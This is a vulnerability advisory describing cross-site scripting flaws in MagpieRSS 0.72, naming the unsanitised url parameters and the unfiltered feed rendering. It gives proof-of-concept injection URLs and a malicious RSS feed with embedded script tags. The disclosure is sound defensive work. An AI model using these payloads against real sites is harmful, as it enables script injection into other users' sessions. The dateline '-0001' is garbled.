MagpieRSS Multiple XSS Vulnerabilities

30 November -0001

MagpieRSS (http://magpierss.sourceforge.net) is a PHP based RSS reader. "MagpieRSS is compatible with RSS 0.9 through RSS 1.0. Also parses RSS 1.0's modules, RSS 2.0, and Atom. (with a few exceptions)." Magpie is often included as a component in other PHP applications so vulnerabilities in Magpie may have security implications for other applications. Magpie suffers from multiple cross site scripting (XSS) vulnerabilities. The first class of vulnerability is due to the failure to sanitize URL variables in scripts included with the MagpieRSS distribution. Specifically the $url variable is crafted from $_GET['url'] and used in display to users in:

magpierss-0.72/scripts/magpie_simple.php
magpierss-0.72/scripts/magpie_debug.php

The file magpierss-0.72/scripts/magpie_slashbox.php uses the same $url variable, but cast from $_GET['rss_url'].

The second class of XSS results from MagpieRSS' failure to sanitize any of the RSS feeds it draws using magpierss-0.72/rss_fetch.inc. This could result in cross site scripting vulnerabilities being injected by malicious RSS feeds.

Proof of concept

The following links can be used to trigger XSS in Magpie's sample scripts:

http://192.168.0.2site/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script
http://192.168.0.2/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script

The following malicious RSS feed can be used to exploit Magpie's RSS rendering:

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://justin.madirish.net" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin's Personal Homepage</title>
 <link>http://justin.madirish.net</link>
 <description>Close personal friends with Evil Eve.</description>
 <language>en</language>
<item>
 <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title>
 <link>http://justin.madirish.net/node/343 <script>alert('xss link');</script></link>
 <description>foobar</description>
 <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate>
 <dc:creator>justin</dc:creator>
 <guid isPermaLink="false">343 at http://justin.madirish.net </guid>
</item>
</channel>
</rss>

Software: MagpieRSS (http://magpierss.sourceforge.net/)
Version Tested: magpierss-0.72
Vendor notified